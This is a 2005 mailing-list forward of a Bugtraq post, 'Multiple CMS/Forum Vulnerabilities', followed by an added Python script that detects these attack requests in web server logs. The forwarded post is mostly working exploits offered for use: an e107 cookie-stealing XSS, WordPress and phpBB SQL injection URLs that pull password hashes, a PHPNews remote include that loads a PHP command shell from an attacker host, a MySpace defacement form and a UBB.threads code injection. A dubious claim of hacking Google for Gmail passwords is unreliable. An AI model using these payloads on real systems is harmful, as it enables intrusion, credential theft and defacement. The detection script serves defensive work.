From: Michael Shigorin <mike@osdn.org.ua>
To: smoke-room@altlinux.ru
Subject: [room] Fwd: Multiple CMS/Forum Vulnablilties
Date: Mon, 29 Aug 2005 22:45:06 +0300
Message-ID: <20050829194506.GT13435@osdn.org.ua>

Heh.

----- Forwarded message from "pacifico, 0] //--></script>a" <jbiaso/gmail.com> -----

Date: Sat, 27 Aug 2005 20:36:10 -0400
From: "pacifico\", 0] //--></script>a" <jbiaso/gmail.com>
To: bugtraq/securityfocus.com
Subject: Multiple CMS/Forum Vulnablilties

###################################
# Multi-CMS/Forum Vulnerabilities #
# Found by ap0c hackers           #
# pacifico & ratboy               #
###################################

Yo! Ok, well, a couple of new vulnerabilities have been found by.. us :)

------------------
First; e107 xss---
------------------

[link=http://w000000w00tw00t/asdadLI[link= onMouseOver='alert(document.cookie);' h1d3="]<[size=24]HIGHLIGHT ME!!11!1!!!!!1111!!!!!!11!!1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![/size]>[/link][link=h1d3me=']][/link][/link]

Enter this into any message, signature, et cetera, and when highlighted it will alert with the user's cookie. This *may* be further exploitable, but we are not sure, as we've been very busy ;)

------
next; wordpress blog sql injection ---
------

http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*

This will give the administrator hash for the wordpress blog/CMS. We have also found that if you spoof your browser to something like: <?php phpinfo(); ?>, and have a failed login attempt, it is eval'd, and you can execute your own code.

------
Now; PHPNews latest release remote include(); exploit
------

http://path/to/php/news/auth.php?path=http://path/to/exploit/&c=uname%20-a

Ok, now you'll need a host, and change (http://path/to/exploit/) to your host. Now, you will make a directory called "languages". Then in a file named "en_GB.admin.lng", put something like this code:

<?php
// Run the shell command passed in the "c" query parameter and print its output.
$rawr = $_GET['c'];
echo(`$rawr`);
?>

kthx.

-----
And; Knowledge Base PHPBB Mod SQL Injection Exploit
-----

Righto.. so you find a phpbb forum that says: 'Powered by Knowledge Base MOD, wGEric & Haplo (c) 2002-2005' at the bottom, eh? Now, this is totally vulnerable. (the mod changes the index.php to kb.php)

http://path/to/forum/kb.php?mode=article&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMIT%201/*%20&rush=%00

:)

-----
!!!!!!Google.com!!!!!SQL!!!!!Injection!!!!!Exploit!!!!!!
-----

Ok, we expect this to be fixed right away, so be sure to do it quick ;)

Giving google the query:

-b: *++*' UNION SELECT ass,ass from ASS,ass%00/*

Causes an error of "database gm-google.ass does not exist". We've gotten a few user/passes for gmail with this ;) This is done by confusing google's "calculator", so it does *NOT* check the query to make sure it's valid. You'd be surprised how insecure google is, when looked at closely. We also had a bindshell, but they found out, and that's fixed now.

-----
MySpace.com User Profile Defacement.
-----

Once again, this may be fixed very soon. This code should be efficient:

<?php
// Mytoken and FriendID are taken from the query string: t = token, f = friend ID.
$t = $_GET['t'];
$f = $_GET['f'];
echo('
<form action="http://myspace.com/index.cfm?fuseaction=user.addComment" method="post" name="commentForm">
<input type="hidden" name="hashcode" value="MIGKBgkrBgEEAYI3WAOgfTB7BgorBgEEAYI3WAMBoG0wawIDAgABAgJmAwICAMAECGU6VlkoYLOqBBCZiLLKnlWybUUua3SB/xxzBED1fsg4c0zRcY4B8IWZgNbTdYkd/pUk6zpuLXZZAhwC+oxKfrwgQfy+Qnj7XB4pXWTRvgumgCUHsjtspz8/kt6a">
<input type="hidden" name="FriendID" value="' . $f . '24822493">
<input type=hidden name=Mytoken value=' . $t . '>
');
// The comment body is sent already percent-encoded, so double quotes can wrap it
// inside the single-quoted PHP string.
echo('
<input type="hidden" name="f_comments" value="%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTD%3E%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTABLE%3E%3CTR%3E%3Cimg%20src%3D%22http%3A%2F%2Flemonparty.org%2Flemonparty.jpg%22%3E%3CFONT%20SIZE%3D%2224%22%20COLOR%3D%22RED%22%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22down%22%3Eowned.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22left%22%3Eby.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22up%22%3Eap0c.%3C%2Fmarquee%3E%3CBR%3E%3Cnoscript%3E">
<input type="submit" value="Post Comment" onClick="this.disabled = true; document.commentForm.submit();">
</form>
');
?>

example url: http://localhost/myspace0wn.php?t=20050827111256&f=6617

This would deface profile 6617 if the (t) variable is that user's friend. ktx.

-----
Forums ("UBB.threads? 6.3.2") Remote Code Execution.
-----

These boards are very popular among corporate sites (*cough*NBC,CNN*cough*)

http://bo**ds.n**.***/bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post

This would execute phpinfo(); on the victim's server.

##########################
## That's all for this  ##
## "issue" of sweet     ##
## sploits... sincerely ##
## pacifico and ratboy  ##
##########################

Contact? jbiaso@gmail.com

-EOF-

----- End forwarded message -----

--
---- WBR, Michael Shigorin <mike@altlinux.ru>
------ Linux.Kiev http://www.linux.kiev.ua/
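The forwarded post above is built on a handful of request-level shapes: a UNION SELECT smuggled into a query parameter, a URL-valued path= parameter for remote inclusion, PHP tags placed in a parameter or in the User-Agent, and a trailing %00. The following is an added detection example written for this page; it is not code from the post or from e107, WordPress, PHPNews, phpBB or UBB.threads. It parses a few constructed Apache combined-log lines (the addresses, timestamps and sizes are made up), URL-decodes each parameter value repeatedly with a bound (the WordPress payload's %2527 is only a quote after the second decode), and reports which rule fired on which parameter. The rules are illustrative, not a statement about how any of the named products behaves.

```python
"""Request-level detection for the attack patterns in the forwarded post.

Added example for this page; not code from the post or from e107,
WordPress, PHPNews, phpBB or UBB.threads.  Log lines are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns taken from the post's own payloads, generalised slightly.
SQLI_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)   # UNION SELECT ...
RFI_RE = re.compile(r"^(?:https?|ftp)://", re.I)               # path=http://attacker/
PHP_TAG_RE = re.compile(r"<\?php\b|<\?=", re.I)                # <?php phpinfo(); ?>


def deep_unquote(value: str, rounds: int = 3) -> str:
    """URL-decode until stable (bounded).  The WordPress payload sends %2527,
    which is '%27' after one decode and a quote only after the second."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect(line: str):
    """Return {'ip', 'path', 'findings'} for one log line, or None if it
    does not parse.  findings is a list of (rule, location) tuples."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    findings = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = deep_unquote(raw)
        if SQLI_RE.search(value):
            findings.append(("sqli", name))
        if RFI_RE.match(value):
            findings.append(("rfi", name))
        if PHP_TAG_RE.search(value):
            findings.append(("php_tag", name))
        if "\x00" in value:                       # the post's trailing &rush=%00
            findings.append(("nul_byte", name))
    # The post claims the User-Agent is eval'd after a failed WordPress login,
    # so the header is checked with the same PHP-tag rule.
    if PHP_TAG_RE.search(deep_unquote(m.group("ua"))):
        findings.append(("php_tag", "User-Agent"))
    return {"ip": m.group("ip"), "path": parts.path, "findings": findings}


def scan(lines):
    """Return the parsed records that produced at least one finding."""
    hits = []
    for line in lines:
        rec = inspect(line)
        if rec and rec["findings"]:
            hits.append(rec)
    return hits


# Constructed sample log (RFC 5737 addresses); the four attack requests
# mirror the payload shapes in the post, the last line is benign traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Aug/2005:20:36:10 -0400] "GET /wordpress/index.php?'
    'cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,'
    'CHAR(58))%20FROM%20wp_users/* HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Aug/2005:20:37:02 -0400] "POST /wordpress/wp-login.php '
    'HTTP/1.1" 200 812 "-" "<?php phpinfo(); ?>"',
    '203.0.113.5 - - [27/Aug/2005:20:38:44 -0400] "GET /news/auth.php?'
    'path=http://198.51.100.7/&c=uname%20-a HTTP/1.1" 200 231 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Aug/2005:20:39:19 -0400] "GET /forum/kb.php?mode=article'
    '&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20'
    'user_id=2%20LIMIT%201/*%20&rush=%00 HTTP/1.1" 200 990 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [27/Aug/2005:20:40:00 -0400] "GET /forum/kb.php?'
    'mode=article&k=10 HTTP/1.1" 200 990 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["path"], rec["findings"])
```

Running the file prints one line per flagged request; the benign kb.php request produces no finding. The bounded decode loop matters: a detector that decodes once sees "%27 UNION SELECT" for the WordPress payload, and one that decodes without a bound can be kept busy by a value that re-encodes itself.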